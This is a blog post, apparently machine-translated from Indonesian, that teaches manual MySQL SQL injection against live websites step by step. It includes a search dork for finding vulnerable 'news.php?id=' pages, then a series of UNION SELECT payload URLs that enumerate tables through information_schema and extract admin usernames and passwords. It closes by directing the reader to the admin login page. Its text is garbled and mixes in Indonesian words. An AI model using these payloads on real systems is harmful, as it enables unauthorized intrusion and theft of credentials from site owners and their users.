What is SQL injection :
SQL injection is a hacking action performed in the client application by modifying an existing SQL command in memory and clien application is a web exploit technique in which the application uses a database for data storage.
That needs to know before the mysql sql injection:
Carakter: ‘,-
comments: /*,–
information_schema for versi: mysql versi 5.x , not supported for mysql versi 4.x
allinurl:news.php?newsid=
============
=step One:=
============
Find Target
misal: [site]/news.php?id=100
Add the characters ‘ at the end of the URL, or add character “-” to see if there is an error message.
contoh: [site]/news.php?id=100′ or
[site]/news.php?id=-100
===========
=step Two:=
===========
find and count the number of tables available in the database …
use the command: order by
i.e : [site]/news.php?id=-100+order+by+1– or
[site]/news.php?id=-100+order+by+1/*
So, Check step by step…
misal: [site]/news.php?id=-100+order+by+1–
[site]/news.php?id=-100+order+by+2–
[site]/news.php?id=-100+order+by+3–
[site]/news.php?id=-100+order+by+4–
to appear error or missing error message…
example: [site]/news.php?id=-100+order+by+9–
means that we take is up to number 8
become [site]/news.php?id=-100+order+by+8–
============
=step Three:=
============
to figure out how to use the union appears
because of this error until the number 9
then: [site]/news.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok wrote out the numbers is like 5
use the version () or @@ version to check the version of sql command wrote on thats characters and wrote out last
example: [site]/news.php?id=-100+union+select+1,2,3,4,version(),6,7,8– or
[site]/news.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
See yg version used is like 4 versions leave because in this ver 4 we had to guess their own table column n imaginable on the web because they can not use command From+Information_schema ..
for version 5 means you are lucky to not have to guess the n column table like ver ver 4 because the 5 was able to use the command From+Information_schema..
=============
=step Four:=
=============
to display the table imaginable on the web command table_name
>>> included in the figures out last reply
use +from+information_schema.tables/*
>>> inserted after the last number
[site]/news.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–
if the table that appears is “admin”
============
=step Five:=
============
to display all the contents of the table they will be is
command group_concat(table_name)
>>> Included in the figures out last reply
command
+from+information_schema.tables+where+table_schema=database()
>>> inserted after the last number
[site]/news.php?id=-100+union+select+1,2,3,4,group_concat(table_name) ,6,7,8+from+information_schema.tables+where+table_schema=database()–
==============
= step Six: =
==============
command group_concat(column_name)
>>> included in the figures out last reply
command
+from+information_schema.columns+where+table_name=0xhexa–
>>>inserted after the last number
[site]/news.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–
at this stage you must mengextrak word on the content of the table to hexadecimal convert this way
yg website is used for conversion
:http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]
example of compassionate words in the conversion of the admin will be61646D696E
[site]/news.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E–
=============
=step 7:=
=============
yesteryear gave rise to what has been excluded from the table that is the way concat_ws(0x3a,the content column will reply issued)
>>>included in the figures out last reply
command +from+(table name issuedl)
>>> inserted after the last number
[site]/news.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–
examples of words that came out was the id, username, password
[site]/news.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
===============
=step 8:=
===============
final stage looking yard admin or login
then up to you because the web of power is in your hands …
thanks to: Gonzhack
Incoming search terms for the article:
- hack website php dengan sql injection (6) cara hack website dengan sql injection (4) sql injection information_schema (3) information_schema TABLES injection (3) sql injection hack (2) hack sql (2) how to hack email with mysql injection (2) hack web menggunakan sql (2) hack web php injection (2) sql injection command---group_concat (2)
Comments
Leave a comment Trackback